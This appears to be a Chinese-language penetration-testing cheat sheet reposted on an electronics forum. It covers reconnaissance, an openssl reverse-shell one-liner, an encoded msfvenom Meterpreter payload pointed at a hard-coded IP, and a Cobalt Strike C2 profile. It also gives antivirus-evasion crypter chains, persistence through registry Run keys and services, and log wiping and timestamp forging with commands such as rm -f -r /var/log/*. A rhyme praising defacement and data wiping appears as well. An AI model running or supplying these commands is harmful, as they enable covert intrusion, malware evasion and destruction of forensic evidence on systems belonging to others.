0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

个人渗透技巧汇总

jf_hKIAo4na 来源:菜鸟学安全 2023-05-26 15:13 次阅读

前言

首先我们拿到一个站不能心急,凡事三思而行 跑得太快是会滑倒的 当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。 如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。 当然!!!!什么站能扫什么站不能扫,心里一定要有点数! 小提示:在使用proxychains的时候,程序或者终端选项尽量不要设置任何协议的代理,否则可能会打乱这个代理回路出现网络错误。

9ddd933e-fafa-11ed-90ce-dac502259ad0.png

浅蓝的渗透测试导图以及小工具

一个导图,可以做一个大致的方向参考,跟着方向逐一测试,期间也可以巩固基础。https://github.com/iSafeBlue/Mind-Map/releases

9de88f32-fafa-11ed-90ce-dac502259ad0.png

这里再附一个渗透工具包,帮助新手熟悉渗透测试//github.com/lz520520/railgun AWVS + Nessus docker

# 拉取镜像
  docker pull leishianquan/awvs-nessus:v1
  # 启动
  docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
  # 查看容器
  docker ps –a
  # 启动容器
  docker start container-id
  # 进入容器
  docker exec –it container-id /bin/bash


  # 进入容器后,启动nessus
  /etc/init.d/nessusd start


  # 访问扫描器地址和账号密码
  Nessus:
  https://127.0.0.1:8834/#/
  account:leishi/leishianquan


  Awvs13:
  https://127.0.0.1:13443/
  account:admin@admin.com/Admin123

ZERO

首先进行信息收集你获得的信息越多对自己后面的渗透就越有帮助,whois,旁站子域,服务器操作系统版本,web中间件以及waf与cdn,通过google与github看看是否存在已知的漏洞这样有助于快速的获得权限, 端口扫描并判断服务漏洞加以利用,目录的fuzz,弱口令的fuzz,google hack 进一步探测网站的信息后台以及敏感信息,撒旦天眼也是不错的信息工具。

一.时刻关注返回的数据包

漏洞有很多种类型都需要渗透方认证仔细的对每个数据包已经url进行验证,要相信所有的努力都是为成功而付出的。 如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等

验证码与邮箱以及token的返回泄露,以及后台为校验从而可删除的参数。
截获的敏感数据参数,学会在多个数据包反复尝试。
从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。
通过修改返回的状态值,触发js进行逻辑漏洞的渗透。
token的key参数解密构建获取真实user密钥,可拼接、规律、时间戳……

下面是网络上的渗透三字诀

进谷歌  找注入
没注入  就旁注
没旁注  用0day
没0day  猜目录
没目录  就嗅探
爆账户  找后台
传小马  放大马
拿权限  挂页面
放暗链  清数据
渗透企业实战版
搞企业  先扫描
扫描器  商业好
默密码  都知道
社工库  找一找
邮箱号  先列好
九头蛇  跑一跑
搞不定  放大招
找插件  挖一挖
发邮件  凭伪造
没邮箱  搞网站
二级域  皆可爆
老漏洞  没修好
新漏洞  刷一票
干研发  Git 找
源代码  全都要
C D N  可以跳
防火墙  可以撬
堡垒机  可以秒
云防护  可以秒
是企业  没有哪家搞不了!

二.FUZZ的艺术 https://www.freebuf.com/vuls/221129.html

三.WEBBYPASS

linux反弹 shell:

1)VPS 上生成 ssl 证书的公钥/私钥对:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2)VPS 监听反弹 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
3)目标上回连 shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s


VPS 上已获取加密的 getshell 了。
winodws桌面:TeamViewerQS单文件 windows下载文件;certutil -urlcache -split -f https://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.py test.py 脚本反弹内网:reGeorg(https://github.com/sensepost/reGeorg) 1.将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。2.在攻击者机器上,启动reGeorgSocksProxy.py,监听9999 端口,看到 Checking if Georg is ready,确认正常运行,这个时候就可以吧目标机作为跳板了。 waf:中国蚁剑客户端,冰蝎与内存马,反复尝试使用编码字节绕过

四.提权与权限维持

首先通过检查目标服务器的进程与可利用服务以及漏洞ssl加密payload

###生成证书并写入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt


cat  rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw


###监听
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'

老牌工具Cobaltstrike+Profiles

上云和隐藏流量参考free教程(https://www.freebuf.com/articles/network/262445.html) 1.利用keytool生成自己的免费证书(可在kali上生成)

keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件编辑
set sample_name "tryblog POS Malware";


set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter


set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";


#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
    set CN       "TRY"; 
    set O        "TRY";   
    set C        "TRY";
    set L        "TRY";
    set OU       "TRY";  
    set ST       "TRY";
    set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
    set keystore "tryblog.store";
    set password "tryblog";
    set alias "tryblog";
}


#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";


#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";


#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";


http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";


    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";


        id {
            netbios;
            parameter "id";
        }


        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }


    server {
        output {
            print;
        }
    }
}


http-get {
    set uri "/updates";


    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }


    server {
        header "Content-Type" "text/plain";


        output {
            base64;
            print;
        }
    }
}
3.验证c2lint,启动服务端,载入汉化运行
./c2lint C2.profile
./teamserver ip:prot ./C2.profile 
java-Dfile.encoding=UTF-8-javaagent:CobaltStrikeCN.jar-XX:ParallelGCThreads=4-XX:+AggressiveHeap-XX:+UseParallelGC-jarcobaltstrike.jar

免杀远控整理(来自Tide团队)

9df296e4-fafa-11ed-90ce-dac502259ad0.jpg

项目地址//github.com/QChiLan/BypassAntiVirus

windows下的免杀生成(顺序从上到下依次混淆)

如果需要捆绑正常软件运行使用shellter,如不能过免杀,再分步测试以下操作。 cs文件编码混淆用AVIATOR生成。测试可以再用python再当前目录打开一个web服务器:

python3 -m http.server 8080
1.Lime-Crypter 注入线程
2.DeepSeaOBFuscator 封装
3.CryptoObfuscator 混淆
4.https 证书修改
5.base64prionx 混淆
6.themida 加壳
7.https 证书修改
8.viper(在线msf处理平台可加特征和签名很方便) *通用免杀法(简单概括就是1.修改特征码2.花指令免杀3.加壳免杀。)

9dfa486c-fafa-11ed-90ce-dac502259ad0.png

也可以通过把软件分块用杀软重复扫描找到特征码进行修改,当然也可以通过加载器的形式更加靠谱但是需要落地多个文件,c#文件自己封装推荐avator+掩盖日可以过火绒

Veil

Veil是一种免杀生成工具,用于生成绕过常见防病毒解决方案的metasploit有效负载。

一些payload加料的技巧

1、通过ssl与加壳加密palyoad(免杀)2、通过dns或套cdn传输:https://mp.weixin.qq.com/s/fdGnJxDjh1Orb2V76EX8tQ

windows

Exploit批量扫描:Windows-Exploit-Suggester漏洞模块:https://github.com/SecWiki/windows-kernel-exploitsBITS免杀提权:https://github.com/ohpe/juicy-potato

linux

搜寻配置文件中的明文密码、sudo滥用Exploit批量扫描:linux-exploit-suggester、linux-exploit-suggester-2漏洞模块:https://github.com/SecWiki/linux-kernel-exploits

五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)

windows

遇见不能删除的先停止相关服务:net stop “task scheduler”系统日志推荐使用工具:clearlog.exemsf清理:clearev ,run event_manager -c

防火墙日志路径:%systemroot%system32logfiles
IIS日志路径:%systemroot%system32logfles
windows系统日志:%systemroot%system32config
Scheduler服务日志:%systemroot%schedlgu.txt
日志在注册表的键:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系统日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
应用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(检索根目录以及上级目录是否存在备份) 1.清空当前用户历史命令并删除相关文件:
history -c


echo “”> /root/.bash_history


echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全删除如不能删除使用echo依次覆盖:rm -f -r /var/log/*;
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息


/var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息


/var/log/messages :记录Linux操作系统常见的系统和服务错误信息


/var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况


/var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址


/var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看


/var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看


/var/log/maillog 与邮件相关的日志信息


/var/log/cron 与定时任务相关的日志信息


/var/log/spooler 与UUCP和news设备相关的日志信息


/var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)


/var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如who、w、users、finger等就需要访问这个文件
3.更新test.txt的时间和test2.txt时间戳相同:touch -r test.txt test2.txt;设定时间戳:touch -t 201605171210.20 test.txt

web容器路径

数据库通过查询配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml) winodws

capche: C:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche: /usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_logrm-f-r/var/log/*
七、后渗透与流量隐匿

frsocks+protoplex+流量重定向实现端口复用

protoplex是一个协议复用的工具,比如以下命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。用于绕过云主机的nsg安全规则。

./frsocks -sockstype fsocks -listen 2333  //创建本地监听
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根据协议类型转到本地的2333和80端口
重定向命令 linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看转发规则
netsh interface portproxy reset   //清除所有转发规则

将 IP 流量封装进 IMCP 的 ping 数据包进行传输

工具如下 1、icmptunnel:https://github.com/jamesbarlow/icmptunnel 2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/ 3、icmpsh:https://github.com/inquisb/icmpsh 4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP 5、复杂的网络环境可以使用EarchWorm(ew)实现多级代理访问目标主机

后渗透

ps:合理利用后渗透插件可以剩下很多时间,但是要注意痕迹清理。插件有谢公子和梼杌完整版比较常用,Cobaltstrike推荐插件:谢公子、梼杌、Z1-AggressorScripts、ladong

9e038b66-fafa-11ed-90ce-dac502259ad0.png

9e0b37da-fafa-11ed-90ce-dac502259ad0.png

详情参考这个:https://blog.csdn.net/qq_33020901/article/details/98357659 添加开机自启

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f 


reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//设置服务的描述字符串
sc description "server power" "description" 
//设置这个服务为自动启动
sc config "server power" start= auto 
net start "server power" 启动服务

八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)

这里个人做一个备份有需求的自行google,解释一下英文的插件功能。

9e1535aa-fafa-11ed-90ce-dac502259ad0.png

9e1cb366-fafa-11ed-90ce-dac502259ad0.png9e252bfe-fafa-11ed-90ce-dac502259ad0.png Ajax Interceptor:可以自定义ajax的json返回值,前端测试用。 Anti-HoneyPot:红队用,可以检查网页中的蜜罐链接并提示。 ApiRequest.io Ajax Capture Debugging Tool:这个是神器!!强推,可以测试网页中任何的ajax请求包括跨站ajax请求重放,官网提供了只30天的请求历史记录记得保存重要请求。 Decentraleyes:可以拦截一些cdn和本地的文件跟踪器 APK Downloader for Google Play Store :免google框架在线下载应用商店的app。 Buster Captcha Solver for Humans:过goole验证码,有时候识别会比较慢。 Easy WebRTC Block:干掉webrtc的ip回显,避免泄露真实ip IP Whois & Flags Chrome & Websites Rating:自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷,点击进去还可以看到cdn以及whois信息。 NoScript: 慎用,此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息,但是会造成许多网站打开异常。 Identify web technologies :可以帮你分析当前网站所使用的网络技术与框架。 Shodan:网络搜索引擎同fofa与钟馗之眼,互联网设备大杀器 Picture-in-Picture Extension:画中画悬浮窗口看视频 SourceDetector:可以再后台默默的扫描是否有源代码泄露 HackTools:方便懒人使用点击扩展可快速复制sql,xss,反弹shell。 FindSomething :基于浏览器插件的被动式信息提取工具

审核编辑:彭静
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9057

    浏览量

    85258
  • 程序
    +关注

    关注

    116

    文章

    3780

    浏览量

    80925
  • 扫描器
    +关注

    关注

    0

    文章

    158

    浏览量

    11904

原文标题:干货 | 个人渗透技巧汇总(避坑)笔记

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    LABVIEW资料汇总

    将最近所收集到的好东西删减汇总。。对个人学习很有用处
    发表于 07-16 15:37

    静态渗透除湿和动态除湿方式的区别

    `静态渗透标准除湿和动态高速除湿机型的特点常温自动干燥产品的除湿速度,除了间隙式除湿慢于连续除湿之外,间隙式除湿的产品 按结构不同还分为静态渗透除湿和动态高速除湿两种。静态除湿机型,是传统的标准型
    发表于 09-29 11:12

    基于labview的混凝土渗透性监测系统

    基于labview的混凝土渗透性监测系统(1)8个测试通道,精确测量通过混凝土试件的电流(±1%),并实时显示测试电流值;(2)自动检测测试溶液的温度,实时显示温度值;(3)实时的计算电通量,保存实验数据; (4)自动得出混凝土氯离子渗透性指标,显示和输出测量结果。
    发表于 05-29 00:12

    SMT焊点的染色与品牌焊锡丝渗透试验

    `SMT焊点的染色与品牌焊锡丝渗透试验随着SMT技术与一些品牌焊锡丝及元器件高密封装技术的迅速发展,很多品牌焊锡丝隐藏的焊点缺陷很难用直观的方法发现,焊点的质量与可靠性的检测试验技术必须适应这种快速
    发表于 05-03 17:46

    个人的学习资料汇总

    本帖最后由 nyjingle 于 2020-8-11 10:09 编辑 【个人的学习资料汇总贴】MYMINIEYE:60天FPGA工程师入门就业项目实战特训营(视频+开发板)http
    发表于 08-07 11:16

    物联网渗透扩围

    物联网进阶:连接力强化和NB-IoT应用渗透
    发表于 01-25 06:28

    web渗透的测试流程

      渗透测试是什么?网络安全学习中,web渗透的测试流程是怎样的?后渗透的详细步骤解析如何?  渗透测试就是利用我们所掌握的渗透知识,对网站
    发表于 01-29 17:27

    涡流的形成范围和渗透深度与哪些因素有关呢?

      涡流是由于金属导体中存在的自感电动势产生的环流。涡流的形成范围和渗透深度取决于多个因素:  1.导体的电导率:电导率越高,涡流的形成范围越小,渗透深度越浅。  2.导体的尺寸和形状:尺寸越小
    发表于 03-13 17:38

    新能源汽车渗透率将迎来增长拐点 整个行业将进入淘汰赛

    近期,小鹏汽车总裁顾宏地在一场论坛上表示,新能源汽车的渗透率有望在未来两到三年内达到 10%,迎来行业爆发性增长的拐点。目前,新能源汽车的渗透率只有 5%,他从个人电脑、智能手机等行业的发展经验判断,一般新技术冲击传统产品,
    发表于 11-19 16:01 645次阅读

    WEB渗透与IOT渗透的区别分析与IOT渗透测试功能特点

    几维安全IOT渗透测试是一项基于STRIDE模型对功能业务进行威胁发现的安全检测服务。通过对智能终端应用系统的架构设计分析着手,然后对其架构设计中的业务功能实现进行威胁分析,得到业务可能面临的威胁点
    的头像 发表于 08-05 11:36 3465次阅读

    LED电源知识汇总

    LED电源知识汇总(新型电源技术结课论文)-LED电源知识汇总,该文档仅提供参考!!!!!!!!
    发表于 09-29 11:47 78次下载
    LED电源知识<b class='flag-5'>汇总</b>

    白盒渗透测试的优势是什么

    渗透测试是一项重要的进攻性安全演习或操作。如果执行得当,它会极大地提高您组织的安全性。渗透测试分为三种类型,根据渗透测试人员或道德黑客可获得的信息量分类,其中一种是白盒渗透测试。 什么
    的头像 发表于 09-19 10:04 1188次阅读

    渗透测试和边缘

    渗透测试和边缘
    的头像 发表于 01-03 09:45 588次阅读
    <b class='flag-5'>渗透</b>测试和边缘

    个人渗透技巧汇总(避坑)笔记

    当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。
    的头像 发表于 03-30 09:35 1613次阅读

    什么是渗透作用_金属封装又是如何发生渗透

      渗透作用使得芯片封装中没有绝对的气密性封装,那么什么是渗透作用?金属封装又是如何发生渗透的呢?   渗透:气体从密度大的一侧向密度小的一侧渗入、扩散、通过、和逸出固体阻挡层的过程。
    的头像 发表于 11-22 10:27 214次阅读